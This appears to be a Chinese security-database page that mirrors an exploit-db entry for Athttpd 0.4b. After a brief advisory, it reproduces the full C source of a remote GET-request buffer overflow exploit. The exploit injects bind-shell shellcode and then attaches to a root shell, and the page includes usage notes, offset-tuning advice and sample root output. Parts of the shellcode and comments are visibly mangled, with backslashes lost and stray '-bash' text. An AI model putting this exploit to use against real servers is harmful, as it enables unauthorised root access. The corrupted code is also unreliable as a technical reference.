Athttpd 0.4b – GET Remote Buffer Overrun

Athttpd 0.4b – GET Remote Buffer Overrun

漏洞ID 1054184 漏洞类型
发布时间 2003-09-25 更新时间 2003-09-25
图片[1]-Athttpd 0.4b – GET Remote Buffer Overrun-安全小百科CVE编号 N/A
图片[2]-Athttpd 0.4b – GET Remote Buffer Overrun-安全小百科CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/23188
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/8709/info

Athttpd is said to be prone to a remote buffer overrun that could allow an attacker to execute arbitrary code. The problem occurs due to insufficient bounds checking when handling GET requests. As a result, an attacker may be capable of overrunning the bounds of an internal memory buffer and effectively control the flow of execution. 

/******************************* 0-day ;]****************************************
**********************************************************************************
** Remote atphttpd <= 0.4b linux exploit by r-code [email protected]              **
**                                                                              **
** The exploit was successfuly tested against Debian 3.0 (Woody)                **
** and Red Hat 8.0 (Psyche) (both) with atphttpd 0.4b (latest)                  **
** installed from source..                                                      **
**                                                                              **
** The exploit gains the privilages of the user who runs atphttpd               **
** which is usually root.. the offsets may vary even for the same               **
** distros.. (e.g. on two different woody`s with the same athttpd               **
** installed on I got two different offsets working 1300 and 2400), so you      **
** you might have to play with them...                                          **
**                                                                              **
** example:	                                                                **
**                                                                              **
** bash~$ ./athttpd localhost 2400                                              **
**                                                                              **
**(<->) Atphttpd <= 0.4b remote exploit by r-code [email protected]               **
**(<->) Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cypher          **
**                                                                              **
** <==> OFFSET: 0x8fc                                                           **
** <==> RET_ADDR: 0xbffff6fe                                                    **
** <==> Connecting to 'localhost' on port '80'..                                **
** <==> Sending packets..                                                       OO
**                                                                              **
** ### Exploit failed ... just kidding ;]                                       **
** ### Exploit successful - enjoy your shell                                    **
**                                                                              **
** uid=0(root) gid=0(root) groups=0(root)                                       **
**  23:25:51 up  3:21,  1 user,  load average: 0.44, 0.41, 0.42                 **
**  USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU  WHAT       **
**  root     tty1     -                20:05    3:19m  2.32s  2.22s  -bash      **
**  Linux coredump 2.4.20 #1 czw sie 7 22:04:49 UTC 2003 i686 unknown           **
** /atphttpd-0.4b                                                               **
**readline: warning: rl_prep_terminal: cannot get terminal settingsbash-2.05a#  **
**********************************************************************************
**********************************************************************************/ 


#include <stdio.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <netdb.h>
#include <unistd.h>
#include <sys/socket.h>
#include <errno.h>

/* Bind shellcode (port 65535) by Ramon de Carvalho Valle  */

char shellcode[]= /*  72 bytes                          */
    "x31xdb"              /*  xorl    %ebx,%ebx                 */
    "xf7xe3"              /*  mull    %ebx                      */
    "x53"                  /*  pushl   %ebx                      */
    "x43"                  /*  incl    %ebx                      */
    "x53"                  /*  pushl   %ebx                      */
    "x6ax02"              /*  pushl   -bashx02                     */
    "x89xe1"              /*  movl    %esp,%ecx                 */
    "xb0x66"              /*  movb    -bashx66,%al                 */
    "xcdx80"              /*  int     -bashx80                     */
    "xffx49x02"          /*  decl    0x02(%ecx)                */
    "x6ax10"              /*  pushl   -bashx10                     */
    "x51"                  /*  pushl   %ecx                      */
    "x50"                  /*  pushl   %eax                      */
    "x89xe1"              /*  movl    %esp,%ecx                 */
    "x43"                  /*  incl    %ebx                      */
    "xb0x66"              /*  movb    -bashx66,%al                 */
    "xcdx80"              /*  int     -bashx80                     */
    "x89x41x04"          /*  movl    %eax,0x04(%ecx)           */
    "xb3x04"              /*  movb    -bashx04,%bl                 */
    "xb0x66"              /*  movb    -bashx66,%al                 */
    "xcdx80"              /*  int     -bashx80                     */
    "x43"                  /*  incl    %ebx                      */
    "xb0x66"              /*  movb    -bashx66,%al                 */
    "xcdx80"              /*  int     -bashx80                     */
    "x59"                  /*  popl    %ecx                      */
    "x93"                  /*  xchgl   %eax,%ebx                 */
    "xb0x3f"              /*  movb    -bashx3f,%al                 */
    "xcdx80"              /*  int     -bashx80                     */
    "x49"                  /*  decl    %ecx                      */
    "x79xf9"              /*  jns     <bindsocketshellcode+45>  */
    "x68x2fx2fx73x68"  /*  pushl   -bashx68732f2f               */
    "x68x2fx62x69x6e"  /*  pushl   -bashx6e69622f               */
    "x89xe3"              /*  movl    %esp,%ebx                 */
    "x50"                  /*  pushl   %eax                      */
    "x53"                  /*  pushl   %ebx                      */
    "x89xe1"              /*  movl    %esp,%ecx                 */
    "xb0x0b"              /*  movb    -bashx0b,%al                 */
    "xcdx80"              /*  int     -bashx80                     */;

#define LEN 820
#define DEFAULT_OFFSET 2400         /* Offsets might be betwen 1000-3000 , you can try in 100 steps*/
#define PORT 80                     /* Default port */
#define ALIGN 1
    
int connect_to_host(char *hs,int port)
{
        int                     sock,x;
        struct sockaddr_in      addr;
	struct hostent  *host;
	
	if(!(host = gethostbyname(hs))) {
		perror("gethostbyname(): while resolving host");
		exit(1);
	}
	
	
        addr.sin_family = AF_INET;
        addr.sin_port = htons(port);
	bcopy(host->h_addr,&addr.sin_addr,host->h_length);

        if((sock = socket(AF_INET, SOCK_STREAM, 0))<0)         {
                perror("socket() error");
                return(-1);
        }

        if((x = connect(sock, (struct sockaddr *)&addr, sizeof(addr)))<0) {
                perror("connect() error");
                return(-1);
        }

        return sock;
}



void shell(int sd)
{
	    int check;
	    char cmd[]="id; w; uname -a; pwd;export TERM=vt100; exec /bin/bash -in";
	    char buf[2048];
            fd_set fd;

            bzero(buf,2048);
	    send(sd,cmd,strlen(cmd),0);

	    while(1)  {
	
		    fflush(stdout);
		    FD_ZERO(&fd);
		    FD_SET(sd,&fd);
		    FD_SET(STDIN_FILENO,&fd);
		    select(sd+1,&fd,NULL,NULL,NULL);
		
		    if(FD_ISSET(sd,&fd))   {
			    if((check=read(sd,buf,2048))<=0)
				    exit(1);
			
			buf[check]=0;
			printf("%s",buf);
		    }
		
		    if(FD_ISSET(STDIN_FILENO,&fd))    {
			    if((check=read(STDIN_FILENO,buf,2048))>0) {
			        buf[check]=0;
				write(sd,buf,check);
			    }
		    }
	    }
	    return;
}




int main(int argc,char **argv) {
	int i,sd;
	char http_req[LEN];
	unsigned long int ret=0,offset=DEFAULT_OFFSET;


	printf("(<->) Atphttpd <= 0.4b remote exploit by r-code [email protected]");
	printf("(<->) Greetz to: czarny,|stachu|, Nitro, Zami, Razor, Jedlik, Cyphernn");
	

	if(argc<2 || argc>3){
		printf("[-] Usage: %s [host] <offset> #OFFsetn",argv[0]);
		return -1;
	}
			
	
	if(argc>2)
		offset=atoi(argv[2]);
	
	ret=0xbffffffa - offset;
	
	printf("<==> OFFSET: 0x%xn",offset);
	printf("<==> RET_ADDR: 0x%xn",ret);
			

	/* See comment few lines below ;] */
	
	http_req[0x00]='G';
	http_req[0x01]='E';
	http_req[0x02]='T';
	http_req[0x03]=' ';
	http_req[0x04]='/';
	
	 for(i=0x05;i<LEN;) {
		 http_req[ALIGN + i++] = (ret & 0x000000ff);
		 http_req[ALIGN + i++] = (ret & 0x0000ff00) >> 8;
		 http_req[ALIGN + i++] = (ret & 0x00ff0000) >> 16;
		 http_req[ALIGN + i++] = (ret & 0xff000000) >> 24;
	 }

	
	 for(i=0x05;i<(LEN/2);i++)
		 http_req[i]=0x41;          /* Using jump-next instruction instead of nops for a better look ;] */
	     
         for(i=0;i<strlen(shellcode);i++)
	         http_req[(LEN/2)-(strlen(shellcode)/2)+i]=shellcode[i];
		     
	 
	http_req[LEN-0x0c]=' ';
	http_req[LEN-0x0b]='H';
	http_req[LEN-0x0a]='T';
	http_req[LEN-0x09]='T';
	http_req[LEN-0x08]='P';
	http_req[LEN-0x07]='/';
	http_req[LEN-0x06]='1';
	http_req[LEN-0x05]='.';
	http_req[LEN-0x04]='1';
	http_req[LEN-0x03]=0x0d;
	http_req[LEN-0x02]=0x0a;
	http_req[LEN-0x01]=0x00;

	/* Yeah.. I know I just could strcpy/cat it ;].. but so it looks soooooo l33t ;] aint`t it ? ;) */
	
	printf("<==> Connecting to '%s' on port '%d'..n",argv[1],PORT);
	
	if((sd=connect_to_host(argv[1],PORT))<0) {
		printf("<==> Couldn`t connect to host.. :-/n");
		exit(1);
	}
	
	printf("<==> Sending packets..n");
			
		
	if(send(sd,http_req,LEN,0)<0) {
		perror("<==> send(): while sending evil http request");
		return -1;
	}

	close(sd);
		
	if((sd=connect_to_host(argv[1],65535))<0) {
		printf("<==> Exploit failed..! #Probably due to a bad offsetn");
		return -1;
	}


	printf("n### Exploit failed ");
	fflush(stdout);
	sleep(1);
	printf("... just kidding ;]n");
	sleep(1);
	printf("### Exploit successful - enjoy your shellnn");
	shell(sd);
	
	return 1;
}

相关推荐: Microsoft Windows Remote Desktop Protocol Server Key Verification Vulnerability

Microsoft Windows Remote Desktop Protocol Server Key Verification Vulnerability 漏洞ID 1100565 漏洞类型 Design Error 发布时间 2003-04-02 更新时…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享